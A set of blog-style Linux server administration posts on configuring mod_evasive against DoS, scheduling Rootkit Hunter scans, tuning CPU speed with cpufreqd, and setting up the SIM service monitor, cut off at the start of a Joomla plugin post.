    <IfModule mod_evasive20.c>
      DOSHashTableSize 3097
      DOSPageCount 5
      DOSSiteCount 100
      DOSPageInterval 2
      DOSSiteInterval 2
      DOSBlockingPeriod 600
      DOSEmailNotify This email address is being protected from spambots. You need JavaScript enabled to view it.
    </IfModule>
    LoadModule evasive20_module     /usr/lib/apache2-prefork/mod_evasive20.so
    <IfModule mod_evasive20.c>
      DOSHashTableSize 3097
      DOSPageCount 5
      DOSSiteCount 100
      DOSPageInterval 2
      DOSSiteInterval 2
      DOSBlockingPeriod 600
      DOSEmailNotify This email address is being protected from spambots. You need JavaScript enabled to view it.
    </IfModule>


    Restart Apache2 either  with:
    # rcapache2 stop
    # rcapache2 start
    or
    # /etc/init.d/apache2 restart

    Mod_evasive also deliver a sall perl script to try a DOS attack on your own webserver
    # cd /usr/src/mod_evasive
    # perl test.pl

    You should read http ok but after some seconds you will only get HTTP error 403 showing that mod_evasive is correctly running!
  • What is mod_evasive?

    mod_evasive is an evasive maneuvers module for Apache to provide evasive action in the event of an HTTP DoS or DDoS attack or brute force attack. It is also designed to be a detection and network management tool, and can be easily configured to talk to ipchains, firewalls, routers, and etcetera. mod_evasive presently reports abuses via email and syslog facilities.

    Detection is performed by creating an internal dynamic hash table of IP Addresses and URIs, and denying any single IP address from any of the following:

    • Requesting the same page more than a few times per second
    • Making more than 50 concurrent requests on the same child per second
    • Making any requests while temporarily blacklisted (on a blocking list)

    Installation

    apt-get install libapache2-mod-evasive
    mkdir /var/log/apache2/mod_evasive
    chown www-data:www-data /var/log/apache2/mod_evasive

    Configuration

    Create a new file

    vi /etc/apache2/conf.d/01_modevasive.conf

    with this content

    <ifmodule mod_evasive20.c>
     DOSHashTableSize 3097
     DOSPageCount 2
     DOSSiteCount 50
     DOSPageInterval 1
     DOSSiteInterval 1
     DOSBlockingPeriod 10
     DOSLogDir /var/log/apache2/mod_evasive
     DOSEmailNotify root@localhost
     DOSWhitelist 127.0.0.1
    </ifmodule>

    Restart Apache to activate the new module

    /etc/init.d/apache2 restart

    Documentation

    • DOSHashTableSize: Size of the hash table used to store the IPs.
    • DOSPageCount: Number of pages allowed per DOSPageInterval.
    • DOSPageInterval: Time in seconds used by DOSPageCount.
    • DOSSiteCount: Number of objects allowed per DOSSiteInterval.
    • DOSSiteInterval: Time in seconds used by DOSSiteCount.
    • DOSBlockingPeriod: Time in seconds that IPs will be banned. If an IP tries to access the server within this period, the count will be restarted.
    • DOSLogDir: Optional. Directory to store the logs. If not specified, /tmp will be used.
    • DOSEmailNotify: Optional. Mail where notifications will be sent.

    DOSSystemCommand: is Optional.&160; Command to execute if an IP is blocked. For example using iptables:

    DOSSystemCommand "/sbin/iptables -I INPUT -p tcp --dport 80 -s %s -j DROP"
  • Rootkit scanner is scanning tool to ensure you for about 99.9%* you're clean of nasty tools. This tool scans for rootkits, backdoors and local exploits by running tests like:
    • MD5 hash compare
    • Look for default files used by rootkits
    • Wrong file permissions for binaries
    • Look for suspected strings in LKM and KLD modules
    • Look for hidden files
    • Optional scan within plaintext and binary files
    Rootkit Hunter is released as GPL licensed project and free for everyone to use. # wget http://downloads.rootkit.nl/rkhunter-1.1.4.tar.gz
    # tar -xzvf rkhunter-1.1.4.tar.gz
    # cd rkhunter
    # ./installer.sh


    Receive e-mail everyday with the result Rootkit Hunter
    For Root user
    # crontab -e
    For any user
    # crontab -e -u username

    and add

    •0 3 * * * (./usr/local/bin/rkhunter –checkall 2>&1 | mail -s "chkrootkit output" -c This email address is being protected from spambots. You need JavaScript enabled to view it.,This email address is being protected from spambots. You need JavaScript enabled to view it. This email address is being protected from spambots. You need JavaScript enabled to view it.)

    * the correct path can be found with which rkhunter 
    This will run Rootkit Hunter at 3:00 am every day, and e-mail the output to This email address is being protected from spambots. You need JavaScript enabled to view it. and copies to This email address is being protected from spambots. You need JavaScript enabled to view it. and This email address is being protected from spambots. You need JavaScript enabled to view it.

    Nota
    If you ever get a positive alarm, you can try to remove the rootkit, but all professionals would advice you to reinstall the server from scratch, and restore a previous backup (that mean saving nothing from server as soon as the rootkit is revealed....)

    Links

    http://www.rootkit.nl/projects/rootkit_hunter.html
  • A rootkit is a set of software tools intended to conceal running processes, files or system data from the operating system. Rootkits have their origin in benign applications, but in recent years have been used increasingly by malware to help intruders maintain access to systems while avoiding detection. Rootkits exist for a variety of operating systems, such as Microsoft Windows, Linux and Solaris. Rootkits often modify parts of the operating system or install themselves as drivers or kernel modules. [WikiPedia]

    Rootkit scanner is scanning tool which scans for rootkits, backdoors and local exploits by running tests like:
    • MD5 hash compare
    • Look for default files used by rootkits
    • Wrong file permissions for binaries
    • Look for suspected strings in LKM and KLD modules
    • Look for hidden files
    • Optional scan within plaintext and binary files
    Rootkit Hunter is released as GPL licensed project and free for everyone to use. You can download it at
    http://www.rootkit.nl/projects/rootkit_hunter.html

    This tools is just a tar with a set of files inside. It is highly recommended to run it from a read only media to avoid hacker tampering attempts.  run
    # ./installer.sh
    then
    # rkhunter

    h790663:/var/www/vhosts/waltercedric.com/private # rkhunter

    Rootkit Hunter 1.2.9, Copyright 2003-2006, Michael Boelen

    Under active development by the Rootkit Hunter project team. For reporting
    bugs, updates, patches, comments and questions see: rkhunter.sourceforge.net

    Rootkit Hunter comes with ABSOLUTELY NO WARRANTY. This is free software,
    and you are welcome to redistribute it under the terms of the GNU General
    Public License. See LICENSE for details.


    Valid parameters:
    --checkall (-c)           : Check system
    --createlogfile <file>*   : Create logfile (file is optional, defaults to
                              : /var/log/rkhunter.log)
    --cronjob                 : Run as cronjob (removes colored layout)
    --display-logfile         : Show logfile at end of the output
    --help (-h)               : Show this help
    --nocolors*               : Don't use colors for output
    --report-mode*            : Don't show uninteresting information for reports
    --report-warnings-only*   : Show only warnings (lesser output than --report-mode,
                              : more than --quiet)
    --skip-application-check* : Don't run application version checks
    --skip-keypress (-sk)*    : Don't wait after every test (non-interactive)
    --quick*                  : Perform quick scan (instead of full scan)
    --quiet*                  : Be quiet (only show warnings)
    --update                  : Run update tool and check for database updates
    --version                 : Show version and quit
    --versioncheck            : Check for latest version

    --bindir <bindir>*        : Use <bindir> instead of using default binaries
    --configfile <file>*      : Use different configuration file
    --dbdir <dir>*            : Use <dbdir> as database directory
    --rootdir <rootdir>*      : Use <rootdir> instead of / (slash at end)
    --tmpdir <tempdir>*       : Use <tempdir> as temporary directory

    Explicit scan options:
    --allow-ssh-root-user*    : Allow usage of SSH root user login
    --disable-md5-check*      : Disable MD5 checks
    --disable-passwd-check*   : Disable passwd/group checks
    --scan-knownbad-files*    : Perform besides 'known good' check a 'known bad' check
    --check-deleted           : Perform 'deleted files' check
    --check-listen            : Perform 'listening applications' check

    Multiple parameters are allowed
    *) Parameter can only be used with other parameters



    False alarms:

    * Filesystem checks
       Checking /dev for suspicious files...                      [ OK ]
       Scanning for hidden files...                               [ Warning! ]
    ---------------
    /etc/.pwd.lock /dev/.udevdb
    ---------------
    Please inspect:  /dev/.udevdb (directory)


    /dev normally contains only device names and hence udev stores its private configuration information in a hidden directory. Rkhunter
    complains because rootkits are known to create such directories.
     
  • &160;linux-tux core2extreme_quad_cpu
    Cpufreqd is a small daemon to adjust cpu speed and voltage (and not only) for kernels using any of the cpufreq drivers available. Cpufreqd is not a userspace governor.

    Cpufreqd allows you to apply governor profiles from rules based on battery level, ac status, temperature (ACPI or sensors), running programs, cpu usage and (maybe) more. You can also change your nforce FSB clock and video card frequency (NVidia only) or execute arbitrary commands when a specific rule is applied.

    The nice things with Linux is that you have a total, absolute, full control!

    Defining new profiles

    Look for cpufreqd.conf

    My profile settings are in /etc/sysconfig/powersave

    Example of a profile

    [Profile]
    name=On Demand High
    minfreq=1998000
    maxfreq=2331000
    policy=ondemand
    [/Profile]

    Defining Rules:

    Examples of the flexibility offered:

    • If temperature is too high, throttle CPU speed lower
      acpi_temperature=55-80
    • if some application are running, lets say your anti-virus, you may want more CPU:
      programs=drweb
      cpu_interval=0-100

    There is a lot more settings, as usual, just read the manual

    # man cpufreqd.conf&160;

    Querying the CPU

    To list all available profile, just run as root

    # cpufreqd-get -l

    or

    # cpufreq-info

    analyzing CPU 0:
    &160; driver: powernow-k8
    &160; CPUs which need to switch frequency at the same time: 0
    &160; hardware limits: 1000 MHz - 2.00 GHz
    &160; available frequency steps: 2.00 GHz, 1.80 GHz, 1000 MHz
    &160; available cpufreq governors: ondemand, userspace, powersave, performance
    &160; current policy: frequency should be within 2.00 GHz and 2.00 GHz.
    &160;&160;&160;&160;&160;&160;&160;&160;&160;&160;&160;&160;&160;&160;&160;&160;&160; The governor "ondemand" may decide which speed to use
    &160;&160;&160;&160;&160;&160;&160;&160;&160;&160;&160;&160;&160;&160;&160;&160;&160; within this range.
    &160; current CPU frequency is 2.00 GHz (asserted by call to hardware).&160;

    Changing the CPU speed

    &160;

    Now lets change the speed. As a server, I don't see any reason to try to minimize the speed except in order to save electricity. The profile onDemand should be able to provide the best compromise, changing CPU speed based on server load and thus be more green. For the sake of this article, I will forbid the CPU to downgrade its speed...
    Attention you'll have to respect the hardware limit of you processor. In my case I use currently an AMD K8 Opteron 146 rated at maximum 2GHz

    So depending on your processor, you'll have to either

    • Query the Internet to find the CPU speed range or
    • Use cpufreqd-info that's for sure the fastest and safest
    • Extracting the info from where they are (for every cpu):
      cat /sys/devices/system/cpu/cpu0/cpufreq/scaling_available_frequencies
      cat /sys/devices/system/cpu/cpu0/cpufreq/scaling_available_frequencies

    I was shocked to discover that my current max speed was set at 1Ghz, leading to a server consuming 80 to 250% of CPU load.

    By running, this command cpufreq, I force the system to never go below 2GHz.

    cpufrequtils 0.4: cpufreq-set (C) Dominik Brodowski 2004
    Report errors and bugs to This email address is being protected from spambots. You need JavaScript enabled to view it., please.
    Usage: cpufreq-set [options]
    Options:
    &160; -c CPU, --cpu CPU&160;&160;&160;&160;&160;&160;&160; number of CPU where cpufreq settings shall be modified
    &160; -d FREQ, --min FREQ&160;&160;&160;&160;&160; new minimum CPU frequency the governor may select
    &160; -u FREQ, --max FREQ&160;&160;&160;&160;&160; new maximum CPU frequency the governor may select
    &160; -g GOV, --governor GOV&160;&160; new cpufreq governor
    &160; -f FREQ, --freq FREQ&160;&160;&160;&160; specific frequency to be set. Requires userspace
    &160;&160;&160;&160;&160;&160;&160;&160;&160;&160;&160;&160;&160;&160;&160;&160;&160;&160;&160;&160;&160;&160;&160;&160;&160;&160; governor to be available and loaded
    &160; -h, --help&160;&160;&160;&160;&160;&160;&160;&160;&160;&160; Prints out this screen

    Notes:
    1. Omitting the -c or --cpu argument is equivalent to setting it to zero
    2. The -f FREQ, --freq FREQ parameter cannot be combined with any other parameter
    &160;&160; except the -c CPU, --cpu CPU parameter
    3. FREQuencies can be passed in Hz, kHz (default), MHz, GHz, or THz
    &160;&160; by postfixing the value with the wanted unit name, without any space
    &160;&160; (FREQuency in kHz =^ Hz * 0.001 =^ MHz * 1000 =^ GHz * 1000000).

    # cpufreqd-set -c 0 -d 2GHz

    The BogoMips make a jump and also the server load is greatly reduce, this can be confirmed by executing:

    # cat /proc/cpuinfo

    processor&160;&160;&160;&160;&160;&160; : 0
    vendor_id&160;&160;&160;&160;&160;&160; : AuthenticAMD
    cpu family&160;&160;&160;&160;&160; : 15
    model&160;&160;&160;&160;&160;&160;&160;&160;&160;&160; : 39
    model name&160;&160;&160;&160;&160; : AMD Opteron(tm) Processor 146
    stepping&160;&160;&160;&160;&160;&160;&160; : 1
    cpu MHz&160;&160;&160;&160;&160;&160;&160;&160; : 1995.468
    cache size&160;&160;&160;&160;&160; : 1024 KB
    fdiv_bug&160;&160;&160;&160;&160;&160;&160; : no
    hlt_bug&160;&160;&160;&160;&160;&160;&160;&160; : no
    f00f_bug&160;&160;&160;&160;&160;&160;&160; : no
    coma_bug&160;&160;&160;&160;&160;&160;&160; : no
    fpu&160;&160;&160;&160;&160;&160;&160;&160;&160;&160;&160;&160; : yes
    fpu_exception&160;&160; : yes
    cpuid level&160;&160;&160;&160; : 1
    wp&160;&160;&160;&160;&160;&160;&160;&160;&160;&160;&160;&160;&160; : yes
    flags&160;&160;&160;&160;&160;&160;&160;&160;&160;&160; : fpu vme de pse tsc msr pae mce cx8 sep mtrr pge mca cmov
    &160;&160;&160;&160;&160;&160;&160;&160;&160;&160;&160;&160;&160;&160;&160;&160;&160; pat pse36 clflush mmx fxsr sse sse2 syscall nx mmxext
    &160;&160;&160;&160;&160;&160;&160;&160;&160;&160;&160;&160;&160;&160;&160;&160;&160; fxsr_opt lm 3dnowext 3dnow pni lahf_lm
    bogomips&160;&160;&160;&160;&160;&160;&160; : 3994.29

    Back to my Linux desktop

    I really enjoy using OpenSuse 11.1 powered by KDE 4.2, changing CPU settings has never been easier thanks to the applet KPowersave

    KPowersave is the KDE front end for power management. It provides battery monitoring, suspend/ standby triggers and many more power management features for KDE (and GNOME).

    You'll find the same applet in all version of KDE

    powersave KPowersave is great ad very intuitive in KDE 4.2
  • SIM is a system and services monitor for ‘SysVinit’ systems. It is designed to be intuitive and modular in nature, and to provide a clean and informative status system.
    It does this by consistently verifying that services are online, load averages are in check, and log files are at reasonable sizes. Many other SIM modules sport different and in-depth features to bring a well rounded tool to your disposal to stop otherwise common issues daunting internet hosts.

    Features:
    - Service monitoring of HTTP, FTP, DNS, SSH, MYSQL & more
    - Event tracking and alert system
    - Auto restart ability for downed services
    - Checks against network sockets & process list to ensure services are online
    - Advanced HTTP service monitoring, to prevent commonly encountered issues
    - System load monitor with customizable warnings & actions
    - Ability to auto restart system with definable critical load level
    - Priority change configurable for services, at warning or critical load level
    - Informative command line status display
    - Easily customizable configuration file
    - Auto configuration script
    - Auto cronjob setup feature
    - Simple & Informative installation script
    - Integrated auto-update feature
    - And more...

    From http://www.r-fx.org/sim.php

    Installation is one more time straightforward:

    # wget http://www.r-fx.ca/downloads/sim-current.tar.gz
    # tar xvf sim-current.tar.gz
    # cd sim-*

    The installation of sim is easily acomplished, a simple shell script named  'setup' is included with SIM. Running this script will tend to all the install tasks for SIM.

    # ./setup -i
    -i     Install
    -q     Quick install
    -u     Uninstall
    -c     Install/Uninstall cronjob

    Press "SPACE" to go to the next page when you read the licence.

    Press "RETURN" to quit

    The readme is then displayed, press "SPACE", then "RETURN"

    Ideally once SIM is configured it is best to run from a cronjob. The 'setup'
    SIM 2.5-4 <This email address is being protected from spambots. You need JavaScript enabled to view it.>
    Creating installation paths:            [##########]
    Installing SIM 2.5-4 to /usr/local/sim:         [##########]

    SIM 2.5-4 installation completed, related notes:
    Executable:             /usr/local/sim/sim
    Executable symlink:     /usr/local/sbin/sim
    Config file:            /usr/local/sim/conf.sim
    Autoconf script:        /usr/local/sim/autoconf
    Autoconf symlink:       /usr/local/sbin/sim-autoconf
    Cronjob setup:          /usr/local/sim/sim -j

    SIM 2.5-4 must now be configured for use on this system, Press
    return to run the autoconf script (/usr/local/sim/autoconf).

    SIM 2.5-4 Auto-Config Script

    All questions default to value in brackets if no answer is given. If you
    make a typo during the autoconf process, hit CTRL+C (^C) to abort and
    rerun the autoconf script (/usr/local/sim/autoconf).

    The below are general configuration options for SIM:
    press return to continue...

    Where is SIM installed ?
    [/usr/local/sim]:
    "RETURN"

    Where should the sim.log file be created ?
    [/usr/local/sim/sim.log]:
    "RETURN"

    Max size of sim.log before rotated ? (value in KB)
    [128]:
    "RETURN"

    What is the location of your kernel log ?
    Found kernel log at /var/log/messages
    "RETURN"

    Where should alerts be emailed to ? (e.g: root, user@domain)
    [root]:  This email address is being protected from spambots. You need JavaScript enabled to view it.  
    "RETURN" enter a external email, not one from the mail server domain!

    Disable alert emails after how many events, to avoid email flood ?
    (Note: events stats are cleared daily)
    [8]:
    "RETURN"

    The below are configuration options for Service modules:
    press return to continue...

    Auto-restart services found to be offline ? (true=enable, false=disable)
    [true]:
    "RETURN"

    Enforce laxed service checking ? (true=enable, false=disable)
    [true]:
    "RETURN"

    Disable auto-restart after how many downed service events ?
    (Note: events stats are cleared daily)
    [10]:
    "RETURN"

    Enable FTP service monitoring ? (true=enable, false=disable)
    [false]:
    "RETURN"

    Name of the FTP service as appears in 'ps' ?
    Warning: bad ps syntax, perhaps a bogus '-'? See http://procps.sf.net/faq.html
    Found service name as proftpd

    TCP/IP port that FTP operates on ?
    [21]:
    "RETURN"

    Path to FTP service init script ?
    [/etc/init.d/proftpd]:
    "RETURN"

    Enable HTTP service monitoring ? (true=enable, false=disable)
    [false]:true
    "RETURN"

    Name of the HTTP service as appears in 'ps' ?
    Warning: bad ps syntax, perhaps a bogus '-'? See http://procps.sf.net/faq.html
    Found service name as httpd

    TCP/IP port that HTTP operates on ?
    [80]:
    "RETURN"

    Path to HTTP service init script ?
    [/etc/init.d/httpd]:
    "RETURN"

    Enable DNS service monitoring ? (true=enable, false=disable)
    [false]:true
    "RETURN"

    Name of the DNS service as appears in 'ps' ?
    Warning: bad ps syntax, perhaps a bogus '-'? See http://procps.sf.net/faq.html
    Found service name as named


    TCP/IP port that DNS operates on ?
    Found service port as 53

    Path to DNS service init script ?
    Found service init script at /etc/init.d/named

    Enable SSH service monitoring ? (true=enable, false=disable)
    [false]:true
    "RETURN"

    Name of the SSH service as appears in 'ps' ?
    Warning: bad ps syntax, perhaps a bogus '-'? See http://procps.sf.net/faq.html
    Found service name as sshd

    TCP/IP port that SSH operates on ?
    Found service port as 22
    "RETURN"

    Path to SSH service init script ?
    Found service init script at /etc/init.d/sshd

    Enable MYSQL service monitoring ? (true=enable, false=disable)
    [false]:true
    "RETURN"

    Name of the MYSQL service as appears in 'ps' ?
    Warning: bad ps syntax, perhaps a bogus '-'? See http://procps.sf.net/faq.html
    Found service name as mysqld

    TCP/IP port that MYSQL operates on ?
    Found service port as 3306

    Path to MYSQL service init script ?
    Found service init script at /etc/init.d/mysql

    Enable SMTP service monitoring ? (true=enable, false=disable)
    [false]:   
    "RETURN"

    Enable XINET service monitoring ? (true=enable, false=disable)
    [false]:true

    Name of the XINET service as appears in 'ps' ?
    Warning: bad ps syntax, perhaps a bogus '-'? See http://procps.sf.net/faq.html
    Found service name as xinetd

    TCP/IP port that any XINET service operates on (e.g: pop3, 110) ?
    [110]:
    "RETURN"

    In computer networking, xinetd, the eXtended InterNET Daemon, is an open-source daemon which runs on many Unix systems and manages Internet-based connectivity. It offers a more secure extension to or version of inetd, the Internet daemon.

    xinetd features access control mechanisms such as TCP Wrapper ACLs, extensive logging capabilities, and the ability to make services available based on time. It can place limits on the number of servers that the system can start, and has deployable defence mechanisms to protect against port scanners, among other things. from WikiPedia

    Path to XINET service init script ?   seewww.xinetd.org/faq.html  and 
    Found service init script at /etc/init.d/xinetd

    Enable ENSIM service monitoring ? (true=enable, false=disable)
    [false]:
    "RETURN"

    Enable PGSQL service monitoring ? (true=enable, false=disable)
    [false]:
    "RETURN"

    The below are configuration options for Service Specific features:
    press return to continue...
    After an unclean HTTP shutdown, semaphore array's may remain allocated
    and cause the service to fall into a looping restart cycle. Using this
    feature clears semaphore arrays on HTTP restart.
    Enable semaphore cleanup ?
    [false]:
    "RETURN"

    This is an implamented feature in the http module, its purpose is to
    determine if/when the apache server locks up or otherwise stops
    responding.
    Enable URL aware monitoring ?
    [false]:
    "RETURN"

    HTTP log files can grow large and cause the service to crash
    (segfault), this feature will keep the main HTTP logs incheck.
    Enable HTTP log monitor ?
    [false]:true
    "RETURN"

    What is the location of your HTTP servers, log files ?
    (should point to a directory, not file)
    [/var/log/httpd]:/var/log/apache2

    Max size of HTTP log files, before cleared ? (value in MB)
    [300]:
    "RETURN"

    MySQL uses a /tmp symlink of its mysql.sock socket file. This
    feature verifies that the symlink exists from the main mysql.sock
    file, and if not it is recreated.
    Enable MySQL Socket correction ?
    [false]:
    "RETURN"

    The below are configuration options for System modules:
    press return to continue...

    Enable NETWORK monitoring ? (true=enable, false=disable)
    [false]:true
    "RETURN"

    interface to monitor ?
    [eth0]:
    "RETURN"

    Path to NETWORK init script ?
    Found service init script at /etc/init.d/network

    Enable LOAD monitor ? (true=enable, false=disable)
    [false]:
    "RETURN"

    Configuration completed, saving conf.sim...
    Done, conf.sim saved to /usr/local/sim.

    Now the SIM (System Integrity Monitor) has been configured! add it as cron

    # ./setup -c
    SIM 2.5-4 <This email address is being protected from spambots. You need JavaScript enabled to view it.>
    Removed SIM cronjob.
    # ./setup -c
    SIM 2.5-4 <This email address is being protected from spambots. You need JavaScript enabled to view it.>
    Installed SIM cronjob.


    if everything goes well, you can check the installation by typing:

    # /etc/init.d/mysqld stop

    This will stop mysql daemon!, You will receive an email  at the same time, showing that mysql has been stopped and restarted

    System integrity monitor on xxxxx has taken action in responce to an event. Recent event logs are enclosed below for your inspection. There has been 1 events today, if an average of 8 events is reached, e-mail alerts will be terminated for the duration of the day.

    - Events Summary:
    Total event count:   1
    Average event count: 0

    - Service Summary:
    FTP       
    [online - 0 events]
    HTTP      [online - 0 events]
    DNS       [online - 0 events]
    SSH       [online - 0 events]
    MYSQL     [
    restart success1 events]
    XINET     [online - 0 events]

    - System Summary:
    NETWORK   [eth0 - online - 0 events]

    - SIM Log:
    [07/21/07 12:10:01]: touched log file.
    [07/21/07 12:10:01]: sim.dat not found, created.
    [07/21/07 12:10:01]: no .chk modules enabled.
    [07/21/07 12:15:03]: no .chk modules enabled.
    [07/21/07 12:20:01]: no .chk modules enabled.
    [07/21/07 12:25:01]: NETWORK is online.
    [07/21/07 12:25:01]: FTP service is offline.
    [07/21/07 12:25:01]: FTP service is offline.
    [07/21/07 12:25:01]: FTP restart failed, could not find /etc/init.d/proftpd.
    [07/21/07 12:25:01]: FTP restart failed, could not find /etc/init.d/proftpd.
    [07/21/07 12:25:01]: HTTP service is online.
    [07/21/07 12:25:01]: DNS service is online.
    [07/21/07 12:25:01]: SSH service is online.
    [07/21/07 12:25:01]: MYSQL service is online.
    [07/21/07 12:25:01]: XINET service is online.

  • joomla_cms

    joomla_socialsharing_logo_thumb4

    This small plugin add automatically to any articles a set of social icons that let your reader increase your social ranking. It support